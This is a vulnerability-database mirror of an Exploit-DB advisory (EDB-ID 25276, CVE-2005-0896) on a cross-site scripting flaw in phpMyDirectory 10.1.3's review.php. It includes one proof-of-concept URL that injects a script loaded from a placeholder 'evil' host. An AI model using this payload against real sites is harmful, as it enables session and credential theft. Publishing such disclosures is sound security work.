Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbMirciaEDB-ID:25276
HistoryMar 25, 2005 - 12:00 a.m.

PHPMyDirectory 10.1.3 - 'review.php' Multiple Cross-Site Scripting Vulnerabilities

2005-03-2500:00:00
mircia
www.exploit-db.com
13

AI Score

7.4

Confidence

Low

JSON
source: https://www.securityfocus.com/bid/12900/info

phpMyDirectory is prone to a cross-site scripting vulnerability.

The problem presents itself when malicious HTML and script code is sent to the application through various parameters of the 'review.php' script.

This issue may allow for theft of cookie-based authentication credentials or other attacks.

phpMyDirectory 10.1.3-rel is reported vulnerable, however, it is possible that other versions are affected as well. 

http://www.example.com/review.php?id=1&cat=&subcat="><script src=http://evil/foo.js></script>

Related

cvelist 1
nessus 1
nvd 1
cve 1
cvelist
cvelist
CVE-2005-0896
2005-03-29 05:00:00
nessus
nessus
phpMyDirectory review.php subcat Parameter XSS
2005-03-25 00:00:00
nvd
nvd
CVE-2005-0896
2005-05-02 04:00:00
cve
cve
CVE-2005-0896
2005-05-02 04:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:25276
cvelist1nessus1nvd1cve1